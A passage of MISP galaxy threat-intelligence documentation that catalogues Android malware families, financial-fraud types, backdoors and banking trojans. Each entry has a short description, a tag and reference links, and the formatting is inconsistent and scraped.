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Smssniffer

Smssniffer is a Trojan horse that intercepts SMS messages on Android devices.

The tag is: *misp-galaxy:android*="Smssniffer"

Table 344. Table References

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Smsstealer

Smsstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: *misp-galaxy:android*="Smsstealer"

Table 345. Table References

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Smstibook

Smstibook is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: *misp-galaxy:android*="Smstibook"

Table 346. Table References

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**Smszombie**

Smszombie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Smszombie"`

*Table 347. Table References*

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**Snadapps**

Snadapps is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Snadapps"`

*Table 348. Table References*

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**Sockbot**

Sockbot is a Trojan horse for Android devices that creates a SOCKS proxy on the compromised device.

The tag is: `misp-galaxy:android="Sockbot"`

*Table 349. Table References*

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**Sockrat**

Sockrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: `misp-galaxy:android="Sockrat"`

Sockrat has relationships with:

- similar: `misp-galaxy:rat="Adwind RAT"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="Adwind"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:android="Adwind"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="AdWind"` with estimative-language:likelihood-
Sofacy

Sofacy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Sofacy"`

Sofacy has relationships with:

- similar: `misp-galaxy:tool="GAMEFISH"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="SOURFACE"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="CORESHELL"` with `estimative-language:likelihood-probability="likely"

Sosceo

Sosceo is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Sosceo"`

Spitmo

Spitmo is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Spitmo"`
Spitmo.B

Spitmo.B is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spitmo.B"

Table 354. Table References

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Spyagent

Spyagent is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Spyagent"

Table 355. Table References

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Spybubble

Spybubble is a Spyware application for Android devices that logs the device's activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Spybubble"

Table 356. Table References

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Spydafon

Spydafon is a Potentially Unwanted Application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="Spydafon"

Table 357. Table References

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**Spymple**

Spymple is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: `misp-galaxy:android="Spymple"`

*Table 358. Table References*

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**Spyoo**

Spyoo is a spyware program for Android devices that records and sends certain information to a remote location.

The tag is: `misp-galaxy:android="Spyoo"`

*Table 359. Table References*

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**Spytekcell**

Spytekcell is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: `misp-galaxy:android="Spytekcell"`

*Table 360. Table References*

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**Spytrack**

Spytrack is a spyware program for Android devices that periodically sends certain information to a remote location.

The tag is: `misp-galaxy:android="Spytrack"`

*Table 361. Table References*

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Spywaller
Spywaller is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spywaller"

Table 362. Table References

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Stealthgenie
Stealthgenie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Stealthgenie"

Table 363. Table References

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Steek
Steek is a potentially unwanted application that is placed on a download website for Android applications and disguised as popular applications.

The tag is: misp-galaxy:android="Steek"

Table 364. Table References

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Stels
Stels is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Stels"

Table 365. Table References

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**Stiniter**

Stiniter is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: `misp-galaxy:android="Stiniter"`

Table 366. Table References

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**Sumzand**

Sumzand is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: `misp-galaxy:android="Sumzand"`

Table 367. Table References

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**Sysecsms**

Sysecsms is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Sysecsms"`

Table 368. Table References

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**Tanci**

Tanci is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Tanci"`

Table 369. Table References

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Tapjoy

Tapjoy is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tapjoy"

Table 370. Table References

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Tapsnake

Tapsnake is a Trojan horse for Android phones that is embedded into a game. It tracks the phone’s location and posts it to a remote web service.

The tag is: misp-galaxy:android="Tapsnake"

Table 371. Table References

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Tascudap

Tascudap is a Trojan horse for Android devices that uses the compromised device in denial of service attacks.

The tag is: misp-galaxy:android="Tascudap"

Table 372. Table References

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Teelog

Teelog is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Teelog"

Table 373. Table References

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**Temai**

Temai is a Trojan horse for Android applications that opens a back door and downloads malicious files onto the compromised device.

The tag is: `misp-galaxy:android="Temai"`

*Table 374. Table References*

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**Tetus**

Tetus is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Tetus"`

*Table 375. Table References*

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**Tgpush**

Tgpush is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Tgpush"`

*Table 376. Table References*

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**Tigerbot**

Tigerbot is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: `misp-galaxy:android="Tigerbot"`

*Table 377. Table References*

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**Tonclank**

Tonclank is a Trojan horse that steals information and may open a back door on Android devices.
Trogle

Trogle is a worm for Android devices that may steal information from the compromised device.

Twikabot

Twikabot is a Trojan horse for Android devices that attempts to steal information.

Uapush

Uapush is a Trojan horse for Android devices that steals information from the compromised device. It may also display advertisements and send SMS messages from the compromised device.

Umeng

Umeng is an advertisement library that is bundled with certain Android applications.
**Updtbot**

Updtbot is a Trojan horse for Android devices that may arrive through SMS messages. It may then open a back door on the compromised device.

The tag is: `misp-galaxy:android="Updtbot"`

**Upush**

Upush is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Upush"`

**Uracto**

Uracto is a Trojan horse for Android devices that steals personal information and sends spam SMS messages to contacts found on the compromised device.

The tag is: `misp-galaxy:android="Uracto"`

**Uranico**

Uranico is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Uranico"`
Usbcleaver

Usbcleaver is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Usbcleaver"`

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<th>Table 387. Table References</th>
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Utchi

Utchi is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Utchi"`

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Uten

Uten is a Trojan horse for Android devices that may send, block, and delete SMS messages on a compromised device. It may also download and install additional applications and attempt to gain root privileges.

The tag is: `misp-galaxy:android="Uten"`

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Uupay

Uupay is a Trojan horse for Android devices that steals information from the compromised device. It may also download additional malware.

The tag is: `misp-galaxy:android="Uupay"`

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Uxipp

Uxipp is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: `misp-galaxy:android="Uxipp"`

Table 391. Table References

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Vdloader

Vdloader is a Trojan horse for Android devices that opens a back door on the compromised device and steals confidential information.

The tag is: `misp-galaxy:android="Vdloader"`

Table 392. Table References

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VDopia

VDopia is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="VDopia"`

Table 393. Table References

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Virusshield

Virusshield is a Trojan horse for Android devices that claims to scan apps and protect personal information, but has no real functionality.

The tag is: `misp-galaxy:android="Virusshield"`

Table 394. Table References

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**VServ**

VServ is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android=*"VServ"

*Table 395. Table References*

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**Walkinwat**

Walkinwat is a Trojan horse that steals information from the compromised device.

The tag is: *misp-galaxy:android=*"Walkinwat"

*Table 396. Table References*

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**Waps**

Waps is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android=*"Waps"

*Table 397. Table References*

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**Waren**

Waren is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android=*"Waren"

*Table 398. Table References*

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<th>Links</th>
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**Windseeker**

Windseeker is a Trojan horse for Android devices that steals information from the compromised device.
Wiyun

Wiyun is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wiyun"

Wooboo

Wooboo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wooboo"

Wqmobile

Wqmobile is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wqmobile"

YahooAds

YahooAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YahooAds"
Yatoot

Yatoot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Yatoot"`

Table 404. Table References

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Yinhan

Yinhan is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Yinhan"`

Table 405. Table References

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Youmi

Youmi is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Youmi"`

Table 406. Table References

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YuMe

YuMe is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="YuMe"`

Table 407. Table References

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Zeahache

Zeahache is a Trojan horse that elevates privileges on the compromised device.

The tag is: misp-galaxy:android="Zeahache"

Table 408. Table References

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ZertSecurity

ZertSecurity is a Trojan horse for Android devices that steals information and sends it to a remote attacker.

The tag is: misp-galaxy:android="ZertSecurity"

Table 409. Table References

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ZestAdz

ZestAdz is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ZestAdz"

Table 410. Table References

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Zeusmitmo

Zeusmitmo is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Zeusmitmo"

Table 411. Table References

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</table>
SLocker

The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.

The tag is: `misp-galaxy:android="SLocker"`

SLocker is also known as:

- SMSLocker

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<th>Table 412. Table References</th>
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<td><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/mobile-ransomware-pocket-sized-badness/">1</a></td>
</tr>
<tr>
<td><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/">2</a></td>
</tr>
</tbody>
</table>

Loapi

A malware strain known as Loapi will damage phones if users don’t remove it from their devices. Left to its own means, this modular threat will download a Monero cryptocurrency miner that will overheat and overwork the phone’s components, which will make the battery bulge, deform the phone’s cover, or even worse. Discovered by Kaspersky Labs, researchers say Loapi appears to have evolved from Podec, a malware strain spotted in 2015.

The tag is: `misp-galaxy:android="Loapi"`

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Podec

Late last year, we encountered an SMS Trojan called Trojan-SMS.AndroidOS.Podec which used a very powerful legitimate system to protect itself against analysis and detection. After we removed the protection, we saw a small SMS Trojan with most of its malicious payload still in development. Before long, though, we intercepted a fully-fledged version of Trojan-SMS.AndroidOS.Podec in early 2015. The updated version proved to be remarkable: it can send messages to premium-rate numbers employing tools that bypass the Advice of Charge system (which notifies users about the price of a service and requires authorization before making the payment). It can also subscribe users to premium-rate services while bypassing CAPTCHA. This is the first time Kaspersky Lab has encountered this kind of capability in any Android-Trojan.

The tag is: `misp-galaxy:android="Podec"`
Chamois

Chamois is one of the largest PHA families in Android to date and is distributed through multiple channels. While much of the backdoor version of this family was cleaned up in 2016, a new variant emerged in 2017. To avoid detection, this version employs a number of techniques, such as implementing custom code obfuscation, preventing user notifications, and not appearing in the device's app list. Chamois apps, which in many cases come preloaded with the system image, try to trick users into clicking ads by displaying deceptive graphics to commit WAP or SMS fraud.

The tag is: `misp-galaxy:android="Chamois"`

IcicleGum

IcicleGum is a spyware PHA family whose apps rely on versions of the Igexin ads SDK that offer dynamic code-loading support. IcicleGum apps use this library's code-loading features to fetch encrypted DEX files over HTTP from command-and-control servers. The files are then decrypted and loaded via class reflection to read and send phone call logs and other data to remote locations.

The tag is: `misp-galaxy:android="IcicleGum"`

IcicleGum has relationships with:

- similar: `misp-galaxy:android="Igexin"` with estimative-language:likelihood-probability="likely"

BreadSMS

BreadSMS is a large SMS-fraud PHA family that we started tracking at the beginning of 2017. These apps compose and send text messages to premium numbers without the user's consent. In some cases, BreadSMS apps also implement subscription-based SMS fraud and silently enroll users in services provided by their mobile carriers. These apps are linked to a group of command-and-
control servers whose IP addresses change frequently and that are used to provide the apps with
premium SMS numbers and message text.

The tag is: `misp-galaxy:android="BreadSMS"`

### JamSkunk

JamSkunk is a toll-fraud PHA family composed of apps that subscribe users to services without
their consent. These apps disable Wi-Fi to force traffic to go through users' mobile data connection
and then contact command-and-control servers to dynamically fetch code that tries to bypass the
network's WAP service subscription verification steps. This type of PHA monetizes their abuse via
WAP billing, a payment method that works through mobile data connections and allows users to
easily sign up and pay for new services using their existing account (i.e., services are billed directly
by the carrier, and not the service provider; the user does not need a new account or a different
form of payment). Once authentication is bypassed, JamSkunk apps enroll the device in services
that the user may not notice until they receive and read their next bill.

The tag is: `misp-galaxy:android="JamSkunk"`

### Expensive Wall

Expensive Wall is a family of SMS-fraud apps that affected a large number of devices in 2017. Expensive Wall apps use code obfuscation to slow down analysis and evade detection, and rely on
the JS2Java bridge to allow JavaScript code loaded inside a Webview to call Java methods the way
Java apps directly do. Upon launch, Expensive Wall apps connect to command-and-control servers
to fetch a domain name. This domain is then contacted via a Webview instance that loads a
webpage and executes JavaScript code that calls Java methods to compose and send premium SMS
messages or click ads without users' knowledge.

The tag is: `misp-galaxy:android="Expensive Wall"`
**BambaPurple**

BambaPurple is a two-stage toll-fraud PHA family that tries to trick users into installing it by disguising itself as a popular app. After install, the app disables Wi-Fi to force the device to use its 3G connection, then redirects to subscription pages without the user’s knowledge, clicks subscription buttons using downloaded JavaScript, and intercepts incoming subscription SMS messages to prevent the user from unsubscribing. In a second stage, BambaPurple installs a backdoor app that requests device admin privileges and drops a .dex file. This executable checks to make sure it is not being debugged, downloads even more apps without user consent, and displays ads.

The tag is: `misp-galaxy:android="BambaPurple"`

**KoreFrog**

KoreFrog is a family of trojan apps that request permission to install packages and push other apps onto the device as system apps without the user’s authorization. System apps can be disabled by the user, but cannot be easily uninstalled. KoreFrog apps operate as daemons running in the background that try to impersonate Google and other system apps by using misleading names and icons to avoid detection. The KoreFrog PHA family has also been observed to serve ads, in addition to apps.

The tag is: `misp-galaxy:android="KoreFrog"`

**Gaiaphish**

Gaiaphish is a large family of trojan apps that target authentication tokens stored on the device to abuse the user’s privileges for various purposes. These apps use base64-encoded URL strings to avoid detection of the command-and-control servers they rely on to download APK files. These files contain phishing apps that try to steal GAIA authentication tokens that grant the user permissions to access Google services, such as Google Play, Google+, and YouTube. With these tokens, Gaiaphish apps are able to generate spam and automatically post content (for instance, fake app ratings and comments on Google Play app pages).

The tag is: `misp-galaxy:android="Gaiaphish"`
RedDrop

RedDrop can perform a vast array of malicious actions, including recording nearby audio and uploading the data to cloud-storage accounts on Dropbox and Google Drive.

The tag is: *misp-galaxy:android*="RedDrop"

Table 423. Table References

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HenBox

HenBox apps masquerade as others such as VPN apps, and Android system apps; some apps carry legitimate versions of other apps which they drop and install as a decoy technique. While some of legitimate apps HenBox uses as decoys can be found on Google Play, HenBox apps themselves are found only on third-party (non-Google Play) app stores. HenBox apps appear to primarily target the Uyghurs – a Turkic ethnic group living mainly in the Xinjiang Uyghur Autonomous Region in North West China. HenBox has ties to infrastructure used in targeted attacks, with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy. HexBox apps target devices made by Chinese consumer electronics manufacture, Xiaomi and those running MIUI, Xiaomi’s operating system based on Google Android. Furthermore, the malicious apps register their intent to process certain events broadcast on compromised devices in order to execute malicious code. This is common practice for many Android apps, however, HenBox sets itself up to trigger based on alerts from Xiaomi smart-home IoT devices, and once activated, proceeds in stealing information from a myriad of sources, including many mainstream chat, communication and social media apps. The stolen information includes personal and device information.

The tag is: *misp-galaxy:android*="HenBox"

Table 424. Table References

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MysteryBot

Cybercriminals are currently developing a new strain of malware targeting Android devices which blends the features of a banking trojan, keylogger, and mobile ransomware.

The tag is: *misp-galaxy:android*="MysteryBot"

MysteryBot has relationships with:
Skygofree

At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant's functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals. We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy. Moreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild. We named the malware Skygofree, because we found the word in one of the domains.

The tag is: *misp-galaxy:android=*"Skygofree"

Skygofree has relationships with:

- similar: misp-galaxy:malpedia="Skygofree" with estimative-language:likelihood-probability="likely"

BusyGasper

A new family of spyware for Android grabbed the attention of security researchers through its unusual set of features and their original implementation. Tagged BusyGasper by security experts at Kaspersky, the malware stands out through its ability to monitor the various sensors present on the targeted phone. Based on the motion detection logs, it can recognize the opportune time for running and stopping its activity.
**Triout**

Bitdefender says Triout samples they discovered were masquerading in a clone of a legitimate application, but they were unable to discover where this malicious app was being distributed from. The obvious guess would be via third-party Android app stores, or app-sharing forums, popular in some areas of the globe.

**AndroidOS_HidenAd**

active adware family (detected by Trend Micro as AndroidOS_HidenAd) disguised as 85 game, TV, and remote control simulator apps on the Google Play store

**Razdel**

The Banking Trojan found in Google Play is identified as Razdel, a variant of BankBot mobile banking Trojan. This newly observed variant has taken mobile threats to the next level incorporating: Remote access Trojan functions, SMS interception, UI (User Interface) Overlay with masqueraded pages etc.
**Phishing**

In the context of ATT&CK for Fraud, phishing is described as the sending of fraudulent emails to a large audience in order to obtain sensitive information (PII, credentials, payment information). Phishing is never targeted to a specific individual or organisation. Phishing tries to create a sense of urgency or curiosity in order to capture the victim.

The tag is: *misp-galaxy:financial-fraud*="Phishing"

**Spear phishing**

Spear phishing is the use of targeted emails to gain the trust of the target with the goal of committing fraud. Spear phishing messages are generally specific to the target and show an understanding of the target’s organisation structure, supply chain or business.

The tag is: *misp-galaxy:financial-fraud*="Spear phishing"
ATM skimming

ATM Skimming refers to the act of capturing the data stored on a bank cards (tracks) and the Personal Identification Number (PIN) associated to that card. Upon obtaining the data, the criminal proceeds to encode the same information into a new card and use it in combination with the PIN to perform illicit cash withdrawals. ATM Skimming is often achieved with a combination of a skimmer device for the card and a camera to capture the PIN.

The tag is: `misp-galaxy:financial-fraud="ATM skimming"`

Table 433. Table References

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<tr>
<td><a href="https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green">https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green</a></td>
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<tr>
<td><a href="https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/">https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/</a></td>
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</table>

ATM Shimming

ATM Shimming refers to the act of capturing a bank card data accessing the EMV chip installed on the card while presenting the card to a ATM. Due to their low profile, shimmers can be fit inside ATM card readers and are therefore more difficult to detect.

The tag is: `misp-galaxy:financial-fraud="ATM Shimming"`

Table 434. Table References

<table>
<thead>
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</table>
Vishing
The tag is: misp-galaxy:financial-fraud="Vishing"

POS Skimming
The tag is: misp-galaxy:financial-fraud="POS Skimming"

Social Media Scams
The tag is: misp-galaxy:financial-fraud="Social Media Scams"

Malware
The tag is: misp-galaxy:financial-fraud="Malware"

Account-Checking Services
The tag is: misp-galaxy:financial-fraud="Account-Checking Services"

ATM Black Box Attack
The tag is: misp-galaxy:financial-fraud="ATM Black Box Attack"

Insider Trading
The tag is: misp-galaxy:financial-fraud="Insider Trading"

Investment Fraud
The tag is: misp-galaxy:financial-fraud="Investment Fraud"
Romance Scam

The tag is: misp-galaxy:financial-fraud="Romance Scam"

Buying/Renting Fraud

The tag is: misp-galaxy:financial-fraud="Buying/Renting Fraud"

Cash Recovery Scam

The tag is: misp-galaxy:financial-fraud="Cash Recovery Scam"

Fake Invoice Fraud

The tag is: misp-galaxy:financial-fraud="Fake Invoice Fraud"

Business Email Compromise

The tag is: misp-galaxy:financial-fraud="Business Email Compromise"

Scam

The tag is: misp-galaxy:financial-fraud="Scam"

CxO Fraud

The tag is: misp-galaxy:financial-fraud="CxO Fraud"

Compromised Payment Cards

The tag is: misp-galaxy:financial-fraud="Compromised Payment Cards"
Compromised Account Credentials

Compromised Account Credentials
The tag is: misp-galaxy:financial-fraud="Compromised Account Credentials"

Compromised Personally Identifiable Information (PII)

Compromised Personally Identifiable Information (PII)
The tag is: misp-galaxy:financial-fraud="Compromised Personally Identifiable Information (PII)"

Compromised Intellectual Property (IP)

Compromised Intellectual Property (IP)
The tag is: misp-galaxy:financial-fraud="Compromised Intellectual Property (IP)"

SWIFT Transaction

SWIFT Transaction
The tag is: misp-galaxy:financial-fraud="SWIFT Transaction"

Fund Transfer

Fund Transfer
The tag is: misp-galaxy:financial-fraud="Fund Transfer"

Cryptocurrency Exchange

Cryptocurrency Exchange
The tag is: misp-galaxy:financial-fraud="Cryptocurrency Exchange"

ATM Jackpotting

ATM Jackpotting
The tag is: misp-galaxy:financial-fraud="ATM Jackpotting"

Money Mules

Money Mules
The tag is: misp-galaxy:financial-fraud="Money Mules"

Prepaid Cards

Prepaid Cards

The tag is: misp-galaxy:financial-fraud="Prepaid Cards"

Resell Stolen Data

Resell Stolen Data

The tag is: misp-galaxy:financial-fraud="Resell Stolen Data"

ATM Explosive Attack

ATM Explosive Attack

The tag is: misp-galaxy:financial-fraud="ATM Explosive Attack"

Backdoor

A list of backdoor malware.

Backdoor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
raw-data

WellMess

Cross-platform malware written in Golang, compatible with Linux and Windows. Although there are some minor differences, both variants have the same functionality. The malware communicates with a CnC server using HTTP requests and performs functions based on the received commands. Results of command execution are sent in HTTP POST requests data (RSA-encrypted). Main functionalities are: (1) Execute arbitrary shell commands, (2) Upload/Download files. The PE variant of the infection, in addition, executes PowerShell scripts. A .Net version was also observed in the wild.

The tag is: misp-galaxy:backdoor="WellMess"

WellMess has relationships with:

• similar: misp-galaxy:malpedia="WellMess" with estimative-language:likelihood-probability="likely"
Rosenbridge

The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the 
CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-
instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 
instruction. The core executes these commands (which we call the ‘deeply embedded instruction 
set’), bypassing all memory protections and privilege checks.

While the backdoor should require kernel level access to activate, it has been observed to be 
enabled by default on some systems, allowing any unprivileged code to modify the kernel.

The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, 
such as the Management Engine or Platform Security Processor; it is more deeply embedded than 
any known coprocessor, having access to not only all of the CPU’s memory, but its register file and 
execution pipeline as well.

The tag is: misp-galaxy:backdoor="Rosenbridge"

ServHelper

The purpose of the macro was to download and execute a variant of ServHelper that set up reverse 
SSH tunnels that enabled access to the infected host through the Remote Desktop Protocol (RDP) 
port 3389.

"Once ServHelper establishes remote desktop access, the malware contains functionality for the 
threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they 
see fit," researchers from Proofpoint explain in an analysis released today.

The other ServHelper variant does not include the tunneling and hijacking capabilities and 
functions only as a downloader for the FlawedGrace RAT.

The tag is: misp-galaxy:backdoor="ServHelper"
Rising Sun

The Rising Sun backdoor uses the RC4 cipher to encrypt its configuration data and communications. As with most backdoors, on initial infection, Rising Sun will send data regarding the infected system to a command and control (C2) site. That information captures computer and user name, IP address, operating system version and network adapter information. Rising Sun contains 14 functions including executing commands, obtaining information on disk drives and running processes, terminating processes, obtaining file creation and last access times, reading and writing files, deleting files, altering file attributes, clearing the memory of processes and connecting to a specified IP address.

The tag is: misp-galaxy:backdoor="Rising Sun"

SLUB

A new backdoor was observed using the Github Gist service and the Slack messaging system as communication channels with its masters, as well as targeting a very specific type of victim using a watering hole attack. The backdoor dubbed SLUB by the Trend Micro Cyber Safety Solutions Team who detected it in the wild is part of a multi-stage infection process designed by capable threat actors who programmed it in C++. SLUB uses statically-linked curl, boost, and JsonCpp libraries for performing HTTP request, "extracting commands from gist snippets," and "parsing Slack channel communication." The campaign recently observed by the Trend Micro security researchers abusing the Github and Slack uses a multi-stage infection process.

The tag is: misp-galaxy:backdoor="SLUB"

SLUB has relationships with:

- similar: misp-galaxy:tool="SLUB Backdoor" with estimative-language:likelihood-probability="likely"
**Asruex**

Since it first emerged in 2015, Asruex has been known for its backdoor capabilities and connection to the spyware DarkHotel. However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.

The tag is: *misp-galaxy:backdoor="Asruex"*

**Table 440. Table References**

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**FlowerPippi**

The tag is: *misp-galaxy:backdoor="FlowerPippi"*

**Table 441. Table References**

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**Speculoos**

FreeBSD-based payload, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletinCTX267679 which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, considering the exploitation of the vulnerability in conjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates the adversary was absolutely targeting the affected devices.

The tag is: *misp-galaxy:backdoor="Speculoos"*

Speculoos has relationships with:

- used-by: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="very-likely"

**Table 442. Table References**

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Mori Backdoor

Mori Backdoor has been used by Seedworm.

The tag is: `misp-galaxy:backdoor="Mori Backdoor"

Table 443. Table References

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<tbody>
<tr>
<td><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east">https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east</a></td>
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</table>

BazarBackdoor

Something that made the brute-force attacks on RDP connections easier was a new module of the notorious Trojan, TrickBot. It now seems that the TrickBot developers have a new tactic. Cybersecurity researchers have discovered a new phishing campaign that delivers a stealthy backdoor called BazarBackdoor, which can be used to compromise and gain full access to corporate networks. As is the case with 91% of cyberattacks, this one starts with a phishing email. A range of subjects are used to personalize the emails: Customer complaints, coronavirus-themed payroll reports, or employee termination lists. All these emails contain links to documents hosted on Google Docs. To send the malicious emails, the cybercriminals use the marketing platform Sendgrid. This campaign uses spear phishing, which means that the perpetrators have made an effort to ensure that the websites sent in the emails seem legitimate and correspond to the emails subjects.

The tag is: `misp-galaxy:backdoor="BazarBackdoor"

Table 444. Table References

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</table>

SUNBURST

Backdoor.Sunburst is Malwarebytes’ detection name for a trojanized update to SolarWind’s Orion IT monitoring and management software.

The tag is: `misp-galaxy:backdoor="SUNBURST"

SUNBURST is also known as:

- Solarigate
SUNBURST has relationships with:

- **dropped-by**: misp-galaxy:tool="SUNSPOT" with estimative-language:likelihood-probability="likely"
- **used-by**: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 445. Table References

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<tr>
<td><a href="https://blog.malwarebytes.com/detections/backdoor-sunburst/">https://blog.malwarebytes.com/detections/backdoor-sunburst/</a></td>
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**Banker**

A list of banker malware..

Banker is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**

Unknown - raw-data

**Zeus**

Zeus is a trojan horse that is primarily delivered via drive-by-downloads, malvertising, exploit kits and malspam campaigns. It uses man-in-the-browser keystroke logging and form grabbing to steal information from victims. Source was leaked in 2011.

The tag is: `misp-galaxy:banker="Zeus`"

Zeus is also known as:

- Zbot

Zeus has relationships with:

- similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

**Table 446. Table References**

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<tr>
<td><a href="https://usa.kaspersky.com/resource-center/threats/zeus-virus">https://usa.kaspersky.com/resource-center/threats/zeus-virus</a></td>
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</tbody>
</table>

**Vawtrak**

Delivered primarily by exploit kits as well as malspam campaigns utilizing macro based Microsoft Office documents as attachments. Vawtrak/Neverquest is a modularized banking trojan designed to steal credentials through harvesting, keylogging, Man-In-The-Browser, etc.

The tag is: *misp-galaxy:banker="Vawtrak"*

Vawtrak is also known as:

- Neverquest

Vawtrak has relationships with:

- similar: misp-galaxy:tool="Vawtrak" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Vawtrak" with estimative-language:likelihood-probability="likely"

**Table 447. Table References**

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<tr>
<td><a href="https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving">https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving</a></td>
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<td><a href="https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows">https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows</a></td>
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</table>

**Dridex**

